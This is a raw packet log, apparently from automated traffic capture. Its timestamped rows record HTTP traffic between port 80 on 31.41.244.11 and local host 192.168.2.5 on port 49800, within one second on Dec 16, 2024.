Dec 16, 2024 11:03:17.118395090 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.118455887 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.118478060 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.118530989 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.119880915 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.119954109 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.120018005 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.120075941 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.121283054 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.121359110 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.121366978 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.121412039 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.122812986 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.122873068 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.122951984 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.123007059 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.124197960 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.124260902 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.238765001 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.238816023 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.238867998 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.238904953 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.239247084 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.239315987 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.239363909 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.239422083 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.240489960 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.240547895 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.240616083 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.240672112 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.241672993 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.241734028 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.241856098 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.241910934 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.242928028 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.242988110 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.243083000 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.243138075 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.244115114 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.244170904 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.244251966 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.244363070 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.245518923 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.245575905 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.245575905 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.245634079 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.246519089 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.246582031 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.246583939 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.246642113 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.247680902 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.247744083 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.247807980 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.247864008 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.248825073 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.248888969 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.248945951 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.250036001 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.250098944 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.250164032 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.250221014 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.251216888 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.251272917 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.251354933 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.251410007 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.252404928 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.252463102 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.252513885 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.252568007 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.253575087 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.253633976 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.253694057 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.253751040 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.254770041 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.254834890 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.254878044 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.254941940 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.255934000 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.255985022 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.256050110 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.256108046 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.257122993 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.257222891 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.257234097 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.257277012 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.258316040 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.258389950 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.258419991 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.258479118 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.259479046 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.259543896 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.259635925 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.259694099 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.260643959 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.260698080 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.260731936 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.260759115 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.261853933 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.261913061 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.261981010 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.262037039 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.262988091 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.263048887 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.263113976 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.263170958 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.264169931 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.264231920 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.264297009 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.264368057 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.265355110 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.265417099 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.265480995 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.265566111 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.266573906 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.266632080 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.266695976 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.266752958 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.267811060 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.267865896 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.267868996 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.267920017 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.268944025 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.269017935 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.269045115 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.269124031 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.270088911 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.270150900 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.270179987 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.270227909 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.271259069 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.271325111 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.271389008 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.271451950 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.272716045 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.272769928 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.272775888 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.272816896 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.273607016 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.273677111 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.273740053 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.273796082 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.274794102 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.274851084 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.274910927 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.274966002 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.275954962 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.276012897 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.276170015 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.276228905 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.277173996 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.277240038 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.277268887 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.277379036 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.278322935 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.278384924 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.278436899 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.278492928 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.279510975 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.279570103 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.279632092 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.279691935 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.280694962 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.280749083 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.280754089 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.280806065 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.281852961 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.281975031 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.282035112 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.283080101 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.283179998 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.283243895 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.284219980 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.284280062 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.284344912 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.284404039 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.285384893 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.285464048 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.285525084 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.285583019 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.286629915 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.286731005 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.286793947 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.287821054 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.287858009 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.287888050 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.287936926 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.288927078 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.289031982 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.289091110 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.290108919 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.290170908 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.290208101 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.290266991 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.291372061 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.291465998 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.291475058 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.291523933 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.292458057 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.292515993 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.292594910 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.292654991 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.293653011 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.293718100 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.293751955 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.293807983 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.294811964 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.294955015 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.295013905 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.296001911 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.296081066 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.296159983 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.296216965 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.297252893 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.297306061 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.297342062 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.297359943 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.298343897 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.298475981 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.298587084 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.299568892 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.299604893 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.299633026 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.299655914 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.300664902 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.300868988 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.431417942 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.431477070 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.431510925 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.431514025 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.431560993 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.431601048 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.431622982 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.431674004 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.432960033 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.433018923 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.433028936 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.433078051 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.433999062 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.434097052 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.434146881 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.435010910 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.435142994 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.435213089 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.436222076 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.436286926 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.436355114 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.436408043 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.437252045 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.437309027 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.437333107 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.437349081 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.438756943 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.438815117 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.438873053 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.439582109 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.439641953 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.439676046 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.439735889 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.440787077 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.440824032 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.440839052 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.440867901 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.441847086 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.442003965 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.442065001 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.442981005 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.443039894 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.443084002 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.443170071 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.444139957 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.444207907 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.444247961 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.444300890 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.445310116 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.445409060 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.445461988 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.446444988 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.446506023 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.446551085 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.446629047 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.447616100 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.447670937 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.447760105 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.447817087 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.448790073 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.448872089 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.448892117 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.448947906 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.449971914 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.450027943 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.450094938 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.450150967 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.451297045 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.451374054 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.451428890 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.452328920 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.452380896 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.452416897 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.452466011 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.453414917 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.453461885 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.453509092 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.453553915 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.454562902 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.454685926 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.454734087 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.455703974 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.455763102 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.455810070 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.455856085 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.456891060 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.457051039 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.457102060 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.458044052 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.458115101 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.458153963 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.458199024 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.459238052 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.459265947 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.459300995 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.459320068 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.460364103 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.460427046 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.460498095 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.460869074 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.461566925 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.461699009 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.461754084 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.462636948 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.462683916 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.462730885 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.462807894 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.463869095 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.463979959 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.464066982 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.464975119 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.465038061 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.465080023 CET	80	49800	31.41.244.11	192.168.2.5
Dec 16, 2024 11:03:17.465127945 CET	49800	80	192.168.2.5	31.41.244.11
Dec 16, 2024 11:03:17.466114044 CET	80	49800	31.41.244.11	192.168.2.5
